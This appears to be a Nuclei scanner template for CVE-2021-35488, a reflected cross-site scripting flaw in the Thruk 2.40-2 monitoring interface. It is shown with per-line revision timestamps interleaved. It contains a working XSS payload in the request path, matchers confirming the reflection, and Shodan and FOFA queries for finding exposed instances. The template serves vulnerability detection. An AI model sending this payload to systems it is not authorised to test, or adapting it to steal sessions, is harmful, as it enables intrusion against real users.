2022-08-14 21:31:30 +00:00
id : CVE-2021-35488
info :
2022-09-09 17:34:37 +00:00
name : Thruk 2.40-2 - Cross-Site Scripting
2022-08-14 21:31:30 +00:00
author : arafatansari
2022-09-10 02:12:57 +00:00
severity : medium
2022-08-14 21:31:30 +00:00
description : |
2022-09-10 01:55:52 +00:00
Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability.
2022-08-14 21:31:30 +00:00
reference :
- https://www.gruppotim.it/redteam
2022-08-16 18:32:30 +00:00
- https://www.thruk.org/changelog.html
2022-09-10 01:55:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-35488
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2022-08-15 06:34:19 +00:00
classification :
2022-08-16 18:32:30 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-08-15 06:34:19 +00:00
cve-id : CVE-2021-35488
2022-08-16 18:32:30 +00:00
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00145
2024-05-31 19:23:20 +00:00
epss-percentile : 0.50266
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:*
2022-08-14 21:31:30 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : thruk
product : thruk
2023-09-06 12:09:01 +00:00
shodan-query : http.html:"Thruk"
2024-05-31 19:23:20 +00:00
fofa-query : body="thruk"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,thruk,xss
2022-08-14 21:31:30 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-14 21:31:30 +00:00
- method : GET
path :
2022-08-15 06:34:19 +00:00
- "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-08-14 21:31:30 +00:00
matchers-condition : and
matchers :
2022-08-15 06:34:19 +00:00
- type : word
words :
- "'></script><script>alert(document.domain)</script>"
- "Thruk Monitoring"
condition : and
2022-08-14 21:31:30 +00:00
- type : status
status :
- 401
2024-03-25 11:57:16 +00:00
# digest: 4a0a00473045022055819e8cdb5dcdc004233f8a173514f660c7708e98c66aa9920871ec2ca70969022100a7fabd08928656f2dce44bc87916e1e6d23fbe29309f0dff542373be9cf5b065:922c64590222798bb761d5b6d8e72950